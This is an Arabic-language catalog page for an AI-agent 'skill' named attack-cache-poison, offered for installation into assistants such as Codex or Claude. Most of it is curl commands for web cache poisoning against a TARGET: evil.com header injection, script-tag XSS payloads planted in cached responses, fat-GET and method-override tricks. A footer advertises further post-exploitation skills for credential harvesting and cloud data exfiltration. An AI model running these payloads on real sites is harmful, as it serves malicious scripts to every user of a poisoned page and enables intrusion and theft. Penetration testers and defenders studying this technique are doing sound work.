القائمة
Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users
التثبيت باستخدام Codex أو Claude انسخ هذا Prompt والصقه في Codex أو Claude أو مساعد آخر ليراجع صفحة Skill ويثبّتها لك.
استنادا إلى تصنيف SOC المهني
| name | attack-cache-poison |
| description | Web cache poisoning — unkeyed header/parameter injection to serve malicious content to all users |
| category | web-application |
| version | 1.0 |
| author | cyberstrike-official |
| tags | ["cache-poisoning","web","xss","attack"] |
| tech_stack | ["web"] |
| cwe_ids | ["CWE-444","CWE-525"] |
| chains_with | ["attack-host-header","attack-open-redirect"] |
| prerequisites | [] |
| severity_boost | {"attack-host-header":"Host header + cache = stored XSS/redirect affecting all users"} |
Inject malicious content into cached responses via unkeyed inputs (headers, parameters) so that subsequent users receive the poisoned response.
# Check cache headers
curl -s -D- https://TARGET/ | grep -i "x-cache\|age\|cache-control\|cf-cache\|x-varnish"
# Identify cache key components (vary header)
curl -s -D- https://TARGET/ | grep -i "vary"
Test headers that are reflected in response but NOT part of cache key:
# X-Forwarded-Host
curl -s https://TARGET/ -H "X-Forwarded-Host: evil.com" | grep "evil.com"
# X-Forwarded-Scheme
curl -s https://TARGET/ -H "X-Forwarded-Scheme: nothttps" | grep "redirect"
# X-Original-URL / X-Rewrite-URL
curl -s https://TARGET/ -H "X-Original-URL: /admin"
# Custom headers
curl -s https://TARGET/ -H "X-Forwarded-Port: 1234"
# Poison with XSS payload
curl -s https://TARGET/ \
-H "X-Forwarded-Host: evil.com\"><script>alert(1)</script>"
# Wait for cache to store, then verify
curl -s https://TARGET/ | grep "alert(1)"
# Find parameters not in cache key
curl -s "https://TARGET/?cb=123" -D- | grep "x-cache"
curl -s "https://TARGET/?utm_source=evil" | grep "evil"
# Reflected unkeyed parameter → stored XSS
curl -s "https://TARGET/?evil=<script>alert(1)</script>"
# Fat GET — body in GET request
curl -s https://TARGET/ -X GET -d "param=<script>alert(1)</script>"
# POST → GET cache confusion
curl -s https://TARGET/ -X POST \
-H "X-HTTP-Method-Override: GET" \
-d "param=evil"
# Path normalization differences
curl -s "https://TARGET/path/../admin"
curl -s "https://TARGET/PATH" vs "https://TARGET/path"
curl -s "https://TARGET/path;.js"
| Finding | Severity |
|---|---|
| Cached XSS payload served to other users | Critical (P1) |
| Cached redirect to attacker domain | High (P2) |
| Denial of service via cache poisoning (error page cached) | Medium (P3) |
| Unkeyed header reflected (no cache impact proven) | Low (P4) |
eBPF-based post-exploitation for kernel-level credential harvesting, process hiding, and traffic interception on Linux
AWS post-exploitation for IAM privilege escalation, data exfiltration, persistence, and operational security via boto3
Azure/Entra ID post-exploitation for tenant compromise, Key Vault extraction, managed identity abuse, and token manipulation
CI/CD pipeline attacks for secret extraction, pipeline injection, and supply chain compromise via GitHub/Jenkins/GitLab
Kubernetes post-exploitation for container escape, secret extraction, RBAC abuse, and cluster persistence
macOS post-exploitation for credential harvesting, DTrace monitoring, TCC bypass, and stealth operations via native tools